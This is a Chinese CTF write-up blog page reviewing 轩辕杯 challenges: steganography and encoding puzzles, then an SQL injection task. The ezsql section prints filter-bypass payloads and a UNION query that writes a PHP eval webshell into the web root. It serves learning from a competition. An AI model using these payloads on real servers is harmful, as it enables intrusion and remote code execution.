<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="前言 \u200b 轩辕杯misc惨败而归，痛定思痛，决定要好好猛学一下msic Misc \u200b 取证题放取证博客里 哇哇哇瓦 \u200b 附件图片 \u200b 随波逐流一把梭，可以嗦出前半段 \u200b">
<title>轩辕杯wp复盘</title>

<link rel='canonical' href='http://localhost:1313/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/'>

<link rel="stylesheet" href="/scss/style.min.663803bebe609202d5b39d848f2d7c2dc8b598a2d879efa079fa88893d29c49c.css"><meta property='og:title' content="轩辕杯wp复盘">
<meta property='og:description' content="前言 \u200b 轩辕杯misc惨败而归，痛定思痛，决定要好好猛学一下msic Misc \u200b 取证题放取证博客里 哇哇哇瓦 \u200b 附件图片 \u200b 随波逐流一把梭，可以嗦出前半段 \u200b">
<meta property='og:url' content='http://localhost:1313/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/'>
<meta property='og:site_name' content='liernian'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2025-05-28T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2025-05-28T00:00:00&#43;00:00'/>
<meta name="twitter:title" content="轩辕杯wp复盘">
<meta name="twitter:description" content="前言 \u200b 轩辕杯misc惨败而归，痛定思痛，决定要好好猛学一下msic Misc \u200b 取证题放取证博客里 哇哇哇瓦 \u200b 附件图片 \u200b 随波逐流一把梭，可以嗦出前半段 \u200b">
    <link rel="shortcut icon" href="/favicon.ico" />

  


    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu11319725144555339807.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">💯</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">liernian</a></h1>
            <h2 class="site-description">理想主义的中二少年</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://twitter.com'
                        target="_blank"
                        title="Twitter"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-twitter" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E9%93%BE%E6%8E%A5/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>链接</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">
                    
                        <li id="i18n-switch">  
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-language" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M4 5h7" />
  <path d="M9 3v2c0 4.418 -2.239 8 -5 8" />
  <path d="M5 9c-.003 2.144 2.952 3.908 6.7 4" />
  <path d="M12 20l4 -9l4 9" />
  <path d="M19.1 18h-6.2" />
</svg>



                            <select name="language" title="language" onchange="window.location.href = this.selectedOptions[0].value">
                                
                                    <option value="http://localhost:1313/en/" >English</option>
                                
                                    <option value="http://localhost:1313/" selected>简体中文</option>
                                
                                    <option value="http://localhost:1313/ar/" >عربي</option>
                                
                            </select>
                        </li>
                    
                

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>暗色模式</span>
                    </li>
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#前言">前言</a></li>
    <li><a href="#misc">Misc</a>
      <ol>
        <li><a href="#哇哇哇瓦">哇哇哇瓦</a></li>
        <li><a href="#数据审计">数据审计</a></li>
        <li><a href="#隐藏的邀请">隐藏的邀请</a></li>
        <li><a href="#音频的秘密">音频的秘密</a></li>
      </ol>
    </li>
    <li><a href="#web">Web</a>
      <ol>
        <li><a href="#ezsql">ezsql</a>
          <ol>
            <li><a href="#知识点空格绕过和双写绕过sqlmap进阶使用sql打马">知识点：空格绕过和双写绕过、sqlmap进阶使用、sql打马</a></li>
          </ol>
        </li>
        <li><a href="#ezweb">ezweb</a>
          <ol>
            <li><a href="#知识点弱密码文件读取环境源码都读读jwt伪造条件竞争ssti">知识点：弱密码、文件读取（环境源码都读读）、JWT伪造、条件竞争、ssti</a></li>
          </ol>
        </li>
      </ol>
    </li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/wp/" >
                Wp
            </a>
        
            <a href="/categories/web/" >
                Web
            </a>
        
            <a href="/categories/misc/" >
                Misc
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/">轩辕杯wp复盘</a>
        </h2>
    
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">2025-05-28</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    阅读时长: 7 分钟
                </time>
            </div>
        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <h2 id="前言">前言
</h2><p>​	轩辕杯misc惨败而归，痛定思痛，决定要好好猛学一下msic</p>
<h2 id="misc">Misc
</h2><p>​	取证题放取证博客里</p>
<h3 id="哇哇哇瓦">哇哇哇瓦
</h3><p>​	附件图片</p>
<p>​	随波逐流一把梭，可以嗦出前半段</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/5d1b4ed27d3e42911dd71336a95de6f4.png"
	width="772"
	height="788"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/5d1b4ed27d3e42911dd71336a95de6f4_hu16827644019446092746.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/5d1b4ed27d3e42911dd71336a95de6f4_hu3210708169331098090.png 1024w"
	loading="lazy"
	
		alt="5d1b4ed27d3e42911dd71336a95de6f4"
	
	
		class="gallery-image" 
		data-flex-grow="97"
		data-flex-basis="235px"
	
></p>
<p>​	010查看后发现压缩包，打开后是一个hint，给了密钥和提示。</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/643241fb98491e28e4710dc2479e55be.png"
	width="1460"
	height="554"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/643241fb98491e28e4710dc2479e55be_hu9953373321869274730.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/643241fb98491e28e4710dc2479e55be_hu698658589359791676.png 1024w"
	loading="lazy"
	
		alt="643241fb98491e28e4710dc2479e55be"
	
	
		class="gallery-image" 
		data-flex-grow="263"
		data-flex-basis="632px"
	
></p>
<p>​	仔细观察图片发现图片右下角存在像素块。</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522135608373.png"
	width="1001"
	height="583"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522135608373_hu9608242716657775329.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522135608373_hu2647005977205142961.png 1024w"
	loading="lazy"
	
		alt="image-20250522135608373"
	
	
		class="gallery-image" 
		data-flex-grow="171"
		data-flex-basis="412px"
	
></p>
<p>​	到这里就不知道怎么做了，看了wp之后更加觉得离谱。这样可以提取出一个倒着的PK。</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522140025904.png"
	width="1079"
	height="793"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522140025904_hu5364758747488951998.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250522140025904_hu13767021351910046130.png 1024w"
	loading="lazy"
	
		alt="image-20250522140605599"
	
	
		class="gallery-image" 
		data-flex-grow="136"
		data-flex-basis="326px"
	
></p>
<p>​	总结一下，stegsolve过一遍的话要注意文件可能会倒过来。（吃了很多亏了）</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524160615706.png"
	width="1078"
	height="50"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524160615706_hu13165510363362105516.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524160615706_hu16182586471629241326.png 1024w"
	loading="lazy"
	
		alt="image-20250524160615706"
	
	
		class="gallery-image" 
		data-flex-grow="2156"
		data-flex-basis="5174px"
	
></p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524163547228.png"
	width="881"
	height="368"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524163547228_hu8473805226613666093.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524163547228_hu10510793796591476486.png 1024w"
	loading="lazy"
	
		alt="image-20250524163547228"
	
	
		class="gallery-image" 
		data-flex-grow="239"
		data-flex-basis="574px"
	
></p>
<p>​	用脚本倒叙后为这样</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212305669.png"
	width="1974"
	height="904"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212305669_hu3786231862342262560.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212305669_hu5877711609914976640.png 1024w"
	loading="lazy"
	
		alt="image-20250524212305669"
	
	
		class="gallery-image" 
		data-flex-grow="218"
		data-flex-basis="524px"
	
></p>
<p>​	得到后半段</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212645402.png"
	width="1089"
	height="551"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212645402_hu7768043103048344296.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524212645402_hu8162046338331364789.png 1024w"
	loading="lazy"
	
		alt="image-20250524212645402"
	
	
		class="gallery-image" 
		data-flex-grow="197"
		data-flex-basis="474px"
	
></p>
<h3 id="数据审计">数据审计
</h3><p>​	很狗的题，txt、png、wav我都找到了，只有pdf，不知道里面还能藏xss&hellip;&hellip;</p>
<p>​	这里就记录一下</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213014943.png"
	width="1802"
	height="386"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213014943_hu18064179293890439606.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213014943_hu4640072225261007459.png 1024w"
	loading="lazy"
	
		alt="image-20250524213014943"
	
	
		class="gallery-image" 
		data-flex-grow="466"
		data-flex-basis="1120px"
	
></p>
<h3 id="隐藏的邀请">隐藏的邀请
</h3><p>​	docx文件，做法就是换成压缩包，然后能找到Cyyy.xml，里面有十六进制数据</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213448219.png"
	width="908"
	height="705"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213448219_hu8688294397584978910.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524213448219_hu6835673776495553811.png 1024w"
	loading="lazy"
	
		alt="image-20250524213448219"
	
	
		class="gallery-image" 
		data-flex-grow="128"
		data-flex-basis="309px"
	
></p>
<p>​	然后，居然是这个字符和文件名异或&hellip;&hellip;.</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524214957350.png"
	width="1475"
	height="894"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524214957350_hu2987619588233794555.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524214957350_hu3690667131405430204.png 1024w"
	loading="lazy"
	
		alt="image-20250524214957350"
	
	
		class="gallery-image" 
		data-flex-grow="164"
		data-flex-basis="395px"
	
></p>
<p>​	然后是Data Matrix 条码，在线网站解析一下即可（又长见识了）</p>
<p>​	<img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524215245074.png"
	width="1070"
	height="820"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524215245074_hu9294426974690295632.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250524215245074_hu3182752224766210450.png 1024w"
	loading="lazy"
	
		alt="image-20250524215245074"
	
	
		class="gallery-image" 
		data-flex-grow="130"
		data-flex-basis="313px"
	
></p>
<h3 id="音频的秘密">音频的秘密
</h3><p>​	wav，一听就知道是摩斯，在线网站可以嗦一下，发现是假的</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525001828071.png"
	width="1467"
	height="616"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525001828071_hu9609494662884393013.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525001828071_hu4427803234055702174.png 1024w"
	loading="lazy"
	
		alt="image-20250525001828071"
	
	
		class="gallery-image" 
		data-flex-grow="238"
		data-flex-basis="571px"
	
></p>
<p>​	那么音频里是没有思路了，试试隐写</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002155381.png"
	width="481"
	height="757"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002155381_hu10525145174778557520.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002155381_hu17607082723337563509.png 1024w"
	loading="lazy"
	
		alt="image-20250525002155381"
	
	
		class="gallery-image" 
		data-flex-grow="63"
		data-flex-basis="152px"
	
></p>
<p>​	建议低中高都试试，这里是低</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002506221.png"
	width="650"
	height="475"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002506221_hu12036550565452792986.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525002506221_hu17138423014493425827.png 1024w"
	loading="lazy"
	
		alt="image-20250525002506221"
	
	
		class="gallery-image" 
		data-flex-grow="136"
		data-flex-basis="328px"
	
></p>
<p>​	爆破可以多试试</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003517380.png"
	width="661"
	height="249"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003517380_hu6421795221394364996.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003517380_hu15526787758457926071.png 1024w"
	loading="lazy"
	
		alt="image-20250525003517380"
	
	
		class="gallery-image" 
		data-flex-grow="265"
		data-flex-basis="637px"
	
></p>
<p>得到图片后，RGB可以嗦</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003658305.png"
	width="778"
	height="996"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003658305_hu163632407760420025.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525003658305_hu10900317150291096991.png 1024w"
	loading="lazy"
	
		alt="image-20250525003658305"
	
	
		class="gallery-image" 
		data-flex-grow="78"
		data-flex-basis="187px"
	
></p>
<p>得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">qzvk{Ym_LOVE_MZMP_30vs6@_nanmtc_q0i_J01_1}
</span></span></code></pre></td></tr></table>
</div>
</div><p>显然不是flag，结合压缩包里的key，猜到是维吉尼亚</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525004027312.png"
	width="1142"
	height="659"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525004027312_hu15081926467177027076.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250525004027312_hu10420239604666455593.png 1024w"
	loading="lazy"
	
		alt="image-20250525004027312"
	
	
		class="gallery-image" 
		data-flex-grow="173"
		data-flex-basis="415px"
	
></p>
<h2 id="web">Web
</h2><h3 id="ezsql">ezsql
</h3><h4 id="知识点空格绕过和双写绕过sqlmap进阶使用sql打马">知识点：空格绕过和双写绕过、sqlmap进阶使用、sql打马
</h4><p>​	sql注入，fuzz一下发现过滤了空格，然后其实还有双写select</p>
<p>​	这里介绍两种写法，第一种是跑sqlmap，第二种打马</p>
<h5 id="打马">打马
</h5><p>​	首先是打马，先问字段，到了4就失败了，所以是三</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">id=1/**/order/**/by/**/3
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527093100433.png"
	width="1346"
	height="451"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527093100433_hu16498024514149608699.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527093100433_hu10159618929598532376.png 1024w"
	loading="lazy"
	
		alt="image-20250527093100433"
	
	
		class="gallery-image" 
		data-flex-grow="298"
		data-flex-basis="716px"
	
></p>
<p>​	然后打马</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="o">/**/</span><span class="n">union</span><span class="o">/**/</span><span class="n">seselectlect</span><span class="o">/**/</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="s1">&#39;&lt;?=eval($_REQUEST[1]);?&gt;&#39;</span><span class="n">into</span><span class="o">/**/</span><span class="n">outfile</span><span class="o">/**/</span><span class="s1">&#39;/var/www/html/1.php&#39;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094307178.png"
	width="779"
	height="947"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094307178_hu1687909632823303343.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094307178_hu482369332099333757.png 1024w"
	loading="lazy"
	
		alt="image-20250527094307178"
	
	
		class="gallery-image" 
		data-flex-grow="82"
		data-flex-basis="197px"
	
></p>
<p>​	之后可以找到db.sql，读出来有flag</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094621734.png"
	width="1381"
	height="943"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094621734_hu18173544394932680185.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527094621734_hu18280875724860883065.png 1024w"
	loading="lazy"
	
		alt="image-20250527094621734"
	
	
		class="gallery-image" 
		data-flex-grow="146"
		data-flex-basis="351px"
	
></p>
<h5 id="sqlmap">sqlmap
